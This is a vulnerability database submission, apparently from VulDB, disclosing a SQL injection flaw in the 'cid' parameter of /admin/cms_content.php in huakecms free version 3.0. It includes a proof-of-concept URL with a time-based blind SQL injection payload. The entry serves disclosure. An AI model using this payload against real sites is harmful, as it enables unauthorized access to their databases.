| Titolo | huakecms free version3.0 was discovered to contain SQL injection vulnerability |
|---|
| Descrizione | 华科网站管理系统免费版3.0(huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely Strong scalability, can adapt to different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ) |
|---|
| Fonte | ⚠️ https://github.com/yhy217/huakecms-vul/issues/1 |
|---|
| Utente | jamspilly (UID 54414) |
|---|
| Sottomissione | 19/09/2023 07:00 (3 anni fa) |
|---|
| Moderazione | 29/09/2023 07:38 (10 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 240877 [huakecms 3.0 /admin/cms_content.php cid iniezione SQL] |
|---|
| Punti | 20 |
|---|